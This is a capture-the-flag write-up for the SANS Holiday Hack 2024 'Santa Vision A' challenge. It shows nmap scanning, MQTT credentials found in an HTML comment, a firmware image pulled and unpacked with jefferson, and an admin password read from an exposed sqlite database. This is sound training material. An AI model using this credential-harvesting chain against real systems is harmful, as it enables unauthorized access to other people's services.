Santa Vision A
What username logs you into the SantaVision portal?
Difficulty: ❄ ❄ ❄ ❄ ❄
What username logs you into the SantaVision portal?
Hints
Misplaced Credentials
From: Ribb Bonbowford Objective: Santa Vision A See if any credentials you find allow you to subscribe to any MQTT feeds.
Filesystem Analysis
From: Ribb Bonbowford Objective: Santa Vision A jefferson is great for analyzing JFFS2 file systems.
Database Pilfering
From: Ribb Bonbowford Objective: Santa Vision A Consider checking any database files for credentials…
Mosquito Mosquitto
From: Ribb Bonbowford Mosquitto is a great client for interacting with MQTT, but their spelling may be suspect. Prefer a GUI? Try MQTTX
Silver
As a first step, I tried to discover the ports opened on the server with nmap:
1
2
3
4
5
6
7
8
9
10
11
12
thedead@maccos act3-SantaVision % nmap 34.44.88.211 -p-
Nmap scan report for 211.88.44.34.bc.googleusercontent.com (34.44.88.211)
Host is up (0.16s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
1883/tcp open mqtt
5355/tcp filtered llmnr
8000/tcp open http-alt
9001/tcp open tor-orport
Nmap done: 1 IP address (1 host up) scanned in 3165.46 seconds
Reaching the website on http://34.56.1.154:8000, I got presented with a login page: 
This was easily bypassed by looking at the html source and noticing leftover credentials in the comment:
1
2
3
<div class="footer" id="footer">
<b>©2024 Santavision Elventech Co., Ltd. Snow Rights Reserved.<br>(<i>topic 'sitestatus'</i> available.)</b>
</div> <!-- mqtt: elfanon:elfanon -->
Login with user elfanon and password elfanon is successful, with elfanon being the answer to the silver trophy.
Gold
Following the message (topic 'sitestatus' available.) in the footer, I connected as elfanon using mosquitto to the sitestatus feed. Among the other messages, one was particularly interesting:
1
2
3
4
thedead@maccos act3-SantaVision % mosquitto_sub -v -h 34.44.88.211 -p 1883 -u elfanon -P elfanon -t 'sitestatus'
# ...omissis...
sitestatus File downloaded: /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin
# ...omissis...
Once downloaded the file /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin it can be extracted with jefferson and its contents explored:
1
2
3
4
5
6
7
8
9
10
thedead@maccos act3-SantaVision % wget http://34.44.88.211:8000/static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin
# ... omisssis ...
2024-12-23 12:27:10 (687 KB/s) - ‘applicationDefault.bin’ saved [7340032/7340032]
(act3-SantaVision) thedead@maccos act3-SantaVision % jefferson applicationDefault.bin
dumping fs to /Users/thedead/Desktop/repos/SANS_HolidayHack/2024/act3-SantaVision/jffs2-root (endianness: <)
# ... omisssis ...
writing S_ISREG app/src/accounts/views.py
# ... omisssis ...
writing S_ISREG app/src/core/views.py
# ... omisssis ...
Looking at the file app/src/accounts/views.py, I found the reference to a sqlite DB:
1
2
3
4
# ... omisssis ...
@accounts_bp.route("/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", methods=["GET"])
def db():
return send_from_directory("static", "sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", as_attachment=True)
Downloading this file and exploring it, I found the user santaSiteAdmin:
1
2
3
4
5
6
7
8
9
(act3-SantaVision) thedead@maccos act3-SantaVision % wget http://34.44.88.211:8000/static/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite
# ... omisssis ...
2024-12-23 12:35:35 (80.2 KB/s) - ‘SantasTopSecretDB-2024-Z.sqlite’ saved [20480/20480]
(act3-SantaVision) thedead@maccos act3-SantaVision % sqlite3 SantasTopSecretDB-2024-Z.sqlite
# ... omisssis ...
sqlite> .tables
alembic_version users
sqlite> SELECT * FROM users;
1|santaSiteAdmin|S4n+4sr3411yC00Lp455wd|2024-01-23 06:05:29.466071|1
Leveraging on the santaSiteAdmin credentials I could login to the web page again, with santaSiteAdmin being the answer to the gold trophy.